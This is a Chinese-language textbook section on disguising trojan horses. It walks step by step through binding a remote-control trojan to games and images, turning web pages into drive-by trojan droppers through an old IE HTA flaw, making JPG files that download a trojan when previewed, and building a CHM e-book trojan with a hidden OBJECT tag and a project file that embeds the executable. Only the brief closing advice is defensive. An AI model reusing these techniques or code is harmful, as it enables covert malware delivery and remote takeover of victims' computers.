5.6　木马伪装

由于木马有一定危害，很多人对它都有一定防范，所以为了木马能够生存，黑客也常常会进行木马伪装，具体有一下几类。

1）木马伪装成小游戏

木马伪装其实就是利用木马捆绑技术将一个正常的小游戏和木马捆绑在一起，当用户打开此游戏时，同时就会激活木马，黑客可以在自己的本机上连接远程木马并控制远程主机。

EXE捆绑机安装与使用，如图5-10所示。

图5-10　EXE捆绑机执行向导

单击“下一步”打开如图5-11对话框，选择冰河服务器端文件所在位置，按图5-11所示添加路径。

图5-11　EXE捆绑机捆绑的第一个文件

单击“下一步”进入如图5-12所示对话框提示指定捆绑的第二个文件。

图5-12　指定可执行文件2

单击“下一步”指定捆绑后生成的一个新文件，并指定要保存的路径如图5-13所示。

图5-13　生成捆绑后的新文件的保存路径

单击“下一步”进入选择版本对话框，如图5-14所示。

图5-14　选择版本

单击“下一步”打开捆绑文件对话框，如图5-15所示。

图5-15　捆绑文件

单击“单击这里开始捆绑文件”打开如图5-16所示对话框，提示捆绑文件成功。

图5-16　捆绑文件成功

然后我们可以看到第二个文件被绑定到第一个文件上了，如果双击后生成的新文件则木马自动激活。

2）木马伪装成网页

exe2bmp网页木马生成器可以将任意木马集成到网页中，并利用最新IE漏洞在网页浏览者的电脑中后台安装并执行木马程序。

点“选择”选择一个EXE，例如BINTEXT.EXE，然后点“生成”，将在该EXE文件目录下生成同名的三个文件，例如，BINTEXT.BMP，BINTEXT.HTM和BINTEXT.ASP，把这三个文件放到支持ASP的空间，当别人打开BINTEXT.HTM的时候，先前的EXE将被自动下载到对方硬盘并运行，如图5-17所示（这里使用G＿SERVER.EXE）。

图5-17　exe2bmp木马生成器界面

单击“生成”打开如图5-18所示对话框，提示此软件的功能。

图5-18　exe2bmp1.0功能

网页上传前可以先修饰成一个广告弹出框，再加些图片，然后利用加密工具加密。

该功能利用了IE的HTA漏洞，介绍与补丁介绍请看http：／／www.microsoft.com／china／technet／security／bulletin／ms03－032.asp

3）制作图片木马

将图片文件和木马文件捆绑在一起，传送给被入侵方，被入侵者打开文件的同时，会自动打开木马，制作过程如下，可使用超级捆绑V6.0，界面如图5-19所示。

图5-19　超级捆绑V6.0界面

单击“添加一下或多个文件图标”分别加进图片文件和木马文件，如图5-20所示。

图5-20　待捆绑的文件列表中加入想要捆绑的文件

单击“合并”，打开“文件捆绑”对话框并提示合并后的图片文件的大小，如图5-21所示。

图5-21　提示查看捆绑后的文件

单击“确定”可以看到目录中生成了新的图片文件，如图5-22所示。

图5-22　为新生成的合并文件

双击“生成的新文件”打开如图5-23，打开此图片时，木马文件也同时打开并种入对方机器中。

图5-23　打开合并后的文件时木马也同时种入对方机器

但是这样捆绑生成的图片文件发给目标，可能会被对方防火墙拦截或提示有木马，从而被其发现，所以这种方式不够完善，我们介绍另一种方式。

4）图片木马生成器

首选下载图片木马生成器，如图5-24所示。

图5-24　下载的图片木马生成器文件

双击它打开“红蚁JPG木马生成器”对话框，然后输入木马所在的互联网上的位置，如图5-25所示。

图5-25　指定木马的下载地址

点击“生成”可以看到在原来目录中出现了一个图片文件，如图5-26所示。

图5-26　图片代码中含有木马下载网址

此图片文件并没有和互联网上的木马捆绑在一起，而是将木马的下载网址加入到图片代码中，当图片被预览时，木马就会自动下载并在后台运行，由于此图片没有绑定木马，在发送远程目标时，对方机器的防火墙难以过滤。

5）制作电子书木马

网上有很多CHM格式的电子书，可能很多电子书中就含有木马，在阅读时可能不小心就中了木马了。下面介绍电子书木马是如何植入的。

图5-27　QuickCHM安装向导

图5-28　安装许可协议

安装，进入安装向导如图5-27所示。

单击“下一步”进入“使用许可协议”对话框，如图5-28所示。

选中“我接受协议”，单击“下一步”打开“选择目标文件夹”对话框，如图5-29所示。

图5-29　选择安装的目标路径

单击“下一步”进入“选择开始菜单文件夹”，如图5-30所示。

图5-30　选择开始菜单文件夹

单击“下一步”打开“选择附加任务”，对话框如图5-31所示。

图5-31　选择附加任务

单击“下一步”打开“准备安装”对话框，如图5-32所示。

图5-32　准备安装

单击“安装”进入“完成QuickCHM安装向导”对话框，如图5-33所示。

图5-33　完成QuickCHM安装向导

单击“确定”完成安装，打开并运行后的主界面如图5-34所示。

图5-34　QuickCHM的主界面

Step1：要想制作一个完美的CHM木马，少不了电子书的制作工具。在这里我们选择quickchm.chm。

当然，作为木马程序的载体，一本CHM电子书是少不了的。演示所采用的是系统帮助文件。

Step2：首先运行aboutquickchm.chm，打开后如图5-35所示。

图5-35　帮助文件

在右侧的空白处点击右键菜单，进入“属性”页，记录下该电子文档的默认主页AboutQuickCHM.htm和标题栏文字“help.chm”两项信息。

Step3：接下来需要制作一个可以让木马运行并且同时可以自动跳转到AboutQuickCHM.chm默认主页的网页，例如1.htm，源代码如下：

图5-36　QUICKCHM概述的属性

　＜HTML＞

　＜HEAD＞

　＜meta http－equiv＝″refresh″content＝″3；url＝′AboutquichCHM.htm′″＞

　＜／HEAD＞

　＜BODY＞

　＜OBJECT Width＝0Height＝0 style＝″display：none；″TYPE＝″application／x－oleobject″CODEBASE＝″灰色按钮克星.exe″＞

　＜／OBJECT＞

　＜／BODY＞

　＜／HTML＞

代码注释：“content＝″3”是转向时间（单位为秒），可以根据木马程序的运行时间自行修改，建议不要超过5秒。其中的AboutQuichCHM.htm可以改为你用的电子书的默认主页名，“灰色按钮克星.exe”为木马程序名，你可以根据情况更改。

Step4：运行QuickCHM，如图5-37所示。

图5-37　运行QuickCHM

选择文件菜单下的“反编译”项，如图5-38所示。

图5-38　反编译help.chm

接下来在反编译后的目录中可以看到两个.HHK和.HHC文件，注意图5-39中选中的几个文件。

图5-39　反编译出来的文件

Step5：现在要做的就是把木马程序复制到反编译后的目录中（本文中以插入“灰色按钮克星.exe”这款小软件为例），并在此目录下建立一个例如文件名为test.hhp的文件（用记事本即可），代码如下：

［OPTIONS］

Compatibility＝1.1Or later

Compiled file＝help.chm

Default Window＝main

Language＝0x804中文（中国）

［WINDOWS］

Main＝″help″，″help.hhc″，″help.hhk″，″1.htm″，，，，，，0x420，150，0x104E，，0x0，0x0，，，，，0

［FILES］

1.htm

灰色按钮克星.exe

代码注释：“help.chm”是你要生成的电子书名，而“灰色按钮克星.exe”则把它改为要嵌入的木马程序名，“Main＝”后面改为在第一步时你得到的标题栏文字，help.hhc及help.hhk分别改为第三步得到的文件名。

最后用QuickCHM打开test.hhp。

点击“文件”“编译”，待提示完成后，就可以在目标目录中发现已经编译好的带有木马的电子书help.chm了。

我们不可能对下载的每本书都进行反编译工作来加以检查，工作是巨大。笔者建议大家在下载电子书籍时，尽量去知名网站下载。

另外用户也可以修改本地安全属性，使CHM木马无法在本地运行木马程序：将注册表“HKEY＿CURRENT＿USER＼Software＼Microsoft＼Windows＼Current＼Version＼Internet＼Setting＼sones”下的1004项的值由原来十进制的0改为十六进制的3。